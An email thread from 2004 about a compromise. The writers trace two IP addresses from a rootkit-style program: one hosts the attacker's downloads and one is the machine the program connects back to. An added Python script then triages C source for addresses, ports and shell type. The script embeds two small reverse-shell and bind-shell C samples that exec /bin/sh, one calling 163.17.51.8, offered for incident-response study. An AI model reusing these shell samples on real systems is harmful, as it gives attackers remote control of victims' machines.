Hello Mark, On Tue, 13.01.2004 at 17:27, Retallack, Mark (Siemens) wrote:
As far as I can tell there are 2 IP addresses that we have:
218.234.171.84 - from where the files are downloaded
163.17.51.8 - where the application connects to when it is run on the compromised machine.
Ah. I didn't notice there are two machines involved here. Is there a way to find out who is running those machines and send along a message to shut down one of them, so that this script kiddie has to look for another victim?
If you assume that the rs.c source file contains the code for the rhs/.do application, then 163.17.51.8 will be the address that the application connects to on the internet and opens a shell for the remote hacker to use.
From looking at the code, it is not a worm/virus type of application; it requires a human to infect the destination computer.
Which requires another remote exploit. So when I don't run dynamic content on my webserver and the YaST online update installs the latest fixes automatically every night, the risk should be marginal, right?
I think that 218.234.171.84 is just a storage location for the files. If this is correct, then both machines are the origin; however, the 163.17.51.8 computer is the more important one, because it is the one that the hacker would use to communicate with the compromised machine (directly or via a proxy of some sort).
[fun]I'm bored. Let's DoS that machine list! :-)[/fun] Seriously, when such a "hack" can be traced back simply by looking at network traffic and source code, why are folks not going after those machines or their owners?
No real reason. I just like to be paranoid, just in case the file contains JavaScript or something. Just because the file ends in .c does not mean that it is a 'real' C file.
That's what I was wondering about... whether maybe you had already found some malicious content behind that URL.
I've given them a look. Has anybody ever heard of a "pokemon squadron hacking team"?!
Not me. I did notice the name in the html file. Google does not give any information either.
The name suggests some 13 year old script kiddie though ;-)
kind regards, Tobias
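The thread above reasons about rs.c without running it: read the source, find the hard-coded address the program connects back to, and you have the machine the attacker actually uses. The following is an added example (editor's code, not part of the thread and not the rs.c the thread discusses) that performs that static triage on C source text: it extracts IPv4 literals and htons() ports (resolving simple #define names), and classifies the file as a connect-back shell (connect() followed by a /bin/sh exec) or a bind shell (listen()/accept()). The two C samples inside it are constructed for illustration; the address 163.17.51.8 is the one named in the thread, while the port numbers and everything else in the samples are assumptions, not contents of the real file.

```python
import re

# Constructed sample standing in for a downloaded rs.c; this is NOT the real file.
# The address is the connect-back host named in the thread; the port is an assumption.
SAMPLE_CONNECT_BACK = r'''
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define HOST "163.17.51.8"
#define PORT 6667
int main(void) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_port = htons(PORT);
    sa.sin_addr.s_addr = inet_addr(HOST);
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) == 0) {
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
        execl("/bin/sh", "sh", (char *)0);
    }
    return 0;
}
'''

# Constructed contrast sample: a bind shell listens instead of connecting out,
# so it carries no remote address to trace. Port is again an assumption.
SAMPLE_BIND_SHELL = r'''
int main(void) {
    int s = socket(AF_INET, SOCK_STREAM, 0), c;
    struct sockaddr_in sa = {0};
    sa.sin_family = AF_INET;
    sa.sin_port = htons(31337);
    sa.sin_addr.s_addr = INADDR_ANY;
    bind(s, (struct sockaddr *)&sa, sizeof sa);
    listen(s, 1);
    c = accept(s, 0, 0);
    dup2(c, 0); dup2(c, 1); dup2(c, 2);
    execl("/bin/sh", "sh", (char *)0);
    return 0;
}
'''

# Dotted-quad literal with each octet limited to 0..255.
IPV4_RE = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b')
# "#define NAME value" or "#define NAME "value"" (object-like macros only).
DEFINE_RE = re.compile(r'#\s*define\s+(\w+)\s+("?)([^\s"]+)\2')
# htons(<number or macro name>)
HTONS_RE = re.compile(r'htons\(\s*([A-Za-z_]\w*|\d+)\s*\)')
SHELL_EXEC_HINTS = ("/bin/sh", "execve(", "execl(", "execlp(", "system(")


def find_defines(source):
    """Map simple object-like macro names to their textual values."""
    return {m.group(1): m.group(3) for m in DEFINE_RE.finditer(source)}


def find_ipv4_literals(source):
    """All dotted-quad literals in the text, including those inside #defines."""
    return sorted(set(IPV4_RE.findall(source)))


def find_ports(source):
    """Ports passed to htons(), resolving macro names through #defines."""
    defines = find_defines(source)
    ports = set()
    for m in HTONS_RE.finditer(source):
        value = defines.get(m.group(1), m.group(1))
        if value.isdigit():
            ports.add(int(value))
    return sorted(ports)


def classify(source):
    """Rough shape of the program: connect-back, bind shell, or unknown."""
    spawns_shell = any(h in source for h in SHELL_EXEC_HINTS)
    if not spawns_shell:
        return "unknown"
    if "connect(" in source and "listen(" not in source:
        return "connect-back"
    if "listen(" in source and "accept(" in source:
        return "bind-shell"
    return "unknown"


def triage(source):
    """Summarise what a responder needs: kind, remote addresses, ports."""
    return {
        "kind": classify(source),
        "ips": find_ipv4_literals(source),
        "ports": find_ports(source),
    }


if __name__ == "__main__":
    for name, src in (("rs.c (sample)", SAMPLE_CONNECT_BACK),
                      ("bind (sample)", SAMPLE_BIND_SHELL)):
        print(name, triage(src))
```

For a connect-back sample the triage returns the remote address to report to its operator, which is exactly the 163.17.51.8-style host the thread singles out as the more important of the two. This only works on source that keeps its address in the clear; a program that builds the address at run time, XORs the string, or resolves a hostname leaves nothing for the regexes to find, and then the network-traffic side of the thread's approach (watching what the binary actually connects to) is the one that still applies.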